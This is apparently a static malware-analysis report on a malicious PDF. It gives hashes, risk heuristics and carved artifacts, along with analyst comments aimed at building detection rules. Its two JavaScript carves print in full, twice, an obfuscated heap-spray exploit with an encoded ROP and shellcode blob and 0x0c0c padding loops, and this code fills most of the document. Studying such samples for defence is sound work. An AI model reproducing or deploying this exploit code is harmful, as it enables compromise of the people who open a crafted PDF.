Malicious PDF — malware analysis report

Static analysis result for SHA-256 46c93cd6a08bcd2f…

MALICIOUS

PDF

53.5 KB First seen: 2026-05-10
MD5: 2cdbb3fde20890e6c87111d6142c820d SHA-1: b67a1179e924a90d1843dc2df056775dafd04a56 SHA-256: 46c93cd6a08bcd2f370c7e6328c9601de9db912ff04355c62bb300f1f67770e0
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture (XFA), which can contain script logic.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://www.bitstream.com — In PDF document text
    • http://ns.adobe.com/xdp/ — Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ — Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ — Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3775 bytes
SHA-256: 125fd46dc455745d36ea31d3208f551c55a5c5c705575d6176ed97f250cfa571
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
// Analyst annotation of the carved script javascript_obj0012_000.js (PDF /JS object 12,
// offset 0xC3C2). Code lines are verbatim from the preview; only these comments are added.
// All identifiers are long random-looking names (the report flags 8 of 12 as generated),
// so any detection logic should key on the structure below, not on the names.
//
// Alias the global unescape(); every later call through this name decodes %uXXXX
// sequences into a JS (UTF-16) string.
var PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh = unescape;
// Decode a long run of %uXXXX units into a string. Its content is not decoded or
// interpreted in this annotation; the report's static triage classifies it as an
// encoded payload blob (EXTRACTED_FILE_STATIC_TRIAGE).
// NOTE(review): the literal is shown wrapped across two lines in this preview —
// presumably a rendering/extraction line break rather than a newline inside the
// stream (a raw newline would be a syntax error in a single-quoted JS literal);
// confirm against the raw /JS object.
var ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ub9bb%u2167%u2960%ub1c9%udd49%ud9c7%u2474%u5af4%u5a31%u0310%u105a%uea83%u5bfc%udd92%u1288%u1e5d%u4449%ufbd7%u5678%u8883%u6629%uddc7%u0dc1%uf585%u6352%uf902%uc9d3%u3474%ufce3%u9ab8%u9f27%ue144%u7f7b%u2a74%u7e8e%u57b1%ud261%u136a%uc2d0%u611f%ue3e9%uedcf%u9b51%u316a%u1125%u6274%u2e96%u9a3e%u689c%u9b9f%u6b71%ud2e3%u5ffe%ue497%uaed6%ud758%u7c16%ud767%u7d9a%ud0af%u0844%u22db%u0af8%u5818%u9f26%ufabd%u07ad%ufa66%ud162%uf0ed%u96cf%u14aa%u7bd1%u21c1%u7a5a%ua006%u5818%ue882%uc1fb%u5493%ufead%u31c4%u5a12%ud08e%udc47%ubccd%ud2a4%u3ced%u65a3%u0e9d%udd6c%u2309%ufbe5%u44ce%ubbdc%ubb41%ubbdf%u7848%ueb8b%ua9e2%u60b4%u56f3%u2661%uf8a3%u86da%ub913%u6e8a%u367e%u8ef4%u9c81%u249d%u777b%u1062%uaf83%u620a%ube84%ueb96%uaa62%ubd36%u433d%ue4ae%uf2b6%u332f%u35b3%ub7bb%ufb43%ub24c%u6c57%u89bd%u3b0a%u24c2%uc420%uc256%u93e3%uc8ce%ud4d2
%u3350%u6f31%ua158%u18fa%u25a5%ud8fb%u2ff3%ub0fb%u0ba3%ua5a8%u86ab%u75dc%u283e%u2ab5%u40e9%u143b%ucfdd%u73c4%u2cdf%uba13%u4465%uae11%u41a5' );
// Build the two-unit value 0x0c0c 0x0c0c from one-character string pieces. Because
// the text "%u0c0c" never appears contiguously in the source, a signature on that
// literal will not match; detection should look at the concatenation pattern or at
// the decoded value instead.
var ElkWZyAgSePGJfFoDYZktOlCHNWlfcO = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Double the 0x0c0c block until it is just under 65536 characters (the "+ 20 + 8"
// reserve is presumably for string-object overhead; not documented in the sample).
while (ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.length + 20 + 8 < 65536) ElkWZyAgSePGJfFoDYZktOlCHNWlfcO+=ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
// Assemble: (0x0c0c - 0x24)/2 characters of padding, then the decoded blob, then the
// full padding block again. Note this and the two assignments further down have no
// `var`, so in non-strict mode they create implicit globals.
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv = ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.substring(0, (0x0c0c-0x24)/2);
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
// Keep the first 32768 characters of that, double it to 0x80000 characters
// (1 MiB as UTF-16), then trim (0x1020 - 0x08)/2 characters off the end.
vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo = dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv.substring(0, 65536/2);
while(vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.length < 0x80000) vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo += vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo;
byLKrGtSKdLIXwadmSRwpkqczUPthpsXF = vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.substring(0, 0x80000 - (0x1020-0x08) / 2);
// Fill an array with 0x1f0 (496) copies of the ~1 MiB string; the trailing "s" is
// presumably there so each element is a distinct string value (engine-dependent).
// Many large allocations dominated by the repeated 0x0c0c content is the
// "heap spray 0x0C" pattern the report's static shellcode analysis names. The
// unescape alias + pieced "%u0c0c" + doubling loops + large-array fill sequence is
// a stable structural signature regardless of the randomized identifiers.
var DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd = new Array();
for (fpRiyzWVlELbZf=0;fpRiyzWVlELbZf<0x1f0;fpRiyzWVlELbZf++) DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd[fpRiyzWVlELbZf]=byLKrGtSKdLIXwadmSRwpkqczUPthpsXF+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4661 bytes
SHA-256: 891ecd14f28a001b733400ffed76755eaabbd75f63068ed42a9a0be10ada5f86
Preview script
First 1,000 lines of the extracted script
// Analyst annotation of the carved script javascript_obj0012_001.js (PDF /JS object 12,
// offset 0xC3E4). Code lines are verbatim from the preview; only these comments are added.
// The JavaScript statements here are line-for-line the same as in the sibling carve
// javascript_obj0012_000.js, but this artifact is larger (4661 vs 3775 bytes) and a
// different SHA-256, and its preview continues past the script into raw PDF syntax
// (endstream/endobj, objects 13 and 14 with the XFA XML, xref and trailer).
// NOTE(review): that looks like the carve over-ran the end of the /JS stream; the
// ns.adobe.com/xdp and xfa.org URLs listed under EMBEDDED_URL as "Referenced by PDF
// JavaScript" are the xmlns declarations of the XFA document in object 14, not URLs the
// script itself touches — verify before treating them as script-reached indicators.
//
// Alias the global unescape(); every later call through this name decodes %uXXXX
// sequences into a JS (UTF-16) string.
var PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh = unescape;
// Decode a long run of %uXXXX units into a string; content not interpreted here
// (the report's static triage classifies it as an encoded payload blob). The literal
// is shown wrapped across two lines — presumably preview line-wrapping; confirm
// against the raw stream.
var ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ub9bb%u2167%u2960%ub1c9%udd49%ud9c7%u2474%u5af4%u5a31%u0310%u105a%uea83%u5bfc%udd92%u1288%u1e5d%u4449%ufbd7%u5678%u8883%u6629%uddc7%u0dc1%uf585%u6352%uf902%uc9d3%u3474%ufce3%u9ab8%u9f27%ue144%u7f7b%u2a74%u7e8e%u57b1%ud261%u136a%uc2d0%u611f%ue3e9%uedcf%u9b51%u316a%u1125%u6274%u2e96%u9a3e%u689c%u9b9f%u6b71%ud2e3%u5ffe%ue497%uaed6%ud758%u7c16%ud767%u7d9a%ud0af%u0844%u22db%u0af8%u5818%u9f26%ufabd%u07ad%ufa66%ud162%uf0ed%u96cf%u14aa%u7bd1%u21c1%u7a5a%ua006%u5818%ue882%uc1fb%u5493%ufead%u31c4%u5a12%ud08e%udc47%ubccd%ud2a4%u3ced%u65a3%u0e9d%udd6c%u2309%ufbe5%u44ce%ubbdc%ubb41%ubbdf%u7848%ueb8b%ua9e2%u60b4%u56f3%u2661%uf8a3%u86da%ub913%u6e8a%u367e%u8ef4%u9c81%u249d%u777b%u1062%uaf83%u620a%ube84%ueb96%uaa62%ubd36%u433d%ue4ae%uf2b6%u332f%u35b3%ub7bb%ufb43%ub24c%u6c57%u89bd%u3b0a%u24c2%uc420%uc256%u93e3%uc8ce%ud4d2
%u3350%u6f31%ua158%u18fa%u25a5%ud8fb%u2ff3%ub0fb%u0ba3%ua5a8%u86ab%u75dc%u283e%u2ab5%u40e9%u143b%ucfdd%u73c4%u2cdf%uba13%u4465%uae11%u41a5' );
// 0x0c0c 0x0c0c assembled from one-character pieces, so "%u0c0c" never appears
// contiguously in the source text (match on the decoded value, not the literal).
var ElkWZyAgSePGJfFoDYZktOlCHNWlfcO = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Double the block until it is just under 65536 characters.
while (ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.length + 20 + 8 < 65536) ElkWZyAgSePGJfFoDYZktOlCHNWlfcO+=ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
// Padding prefix of (0x0c0c - 0x24)/2 characters, then the decoded blob, then the
// full padding block. These three assignments, and the two below, omit `var` and so
// create implicit globals in non-strict mode.
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv = ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.substring(0, (0x0c0c-0x24)/2);
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
// First 32768 characters, doubled to 0x80000 characters (1 MiB as UTF-16), then
// trimmed by (0x1020 - 0x08)/2 characters.
vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo = dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv.substring(0, 65536/2);
while(vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.length < 0x80000) vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo += vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo;
byLKrGtSKdLIXwadmSRwpkqczUPthpsXF = vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.substring(0, 0x80000 - (0x1020-0x08) / 2);
// 0x1f0 (496) array slots each holding the ~1 MiB string plus "s" — the repeated
// 0x0c0c content across many large allocations is the "heap spray 0x0C" indicator
// the report names; the structure (unescape alias, pieced %u0c0c, doubling loops,
// large-array fill) is the part worth a detection rule, since the identifiers are
// randomized.
var DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd = new Array();
for (fpRiyzWVlELbZf=0;fpRiyzWVlELbZf<0x1f0;fpRiyzWVlELbZf++) DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd[fpRiyzWVlELbZf]=byLKrGtSKdLIXwadmSRwpkqczUPthpsXF+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053941 00000 n
0000053974 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54460
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: a4247bee57dbf5d9dd308adc5f48554bce94ed5d748933604a7aeb694e8a08e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C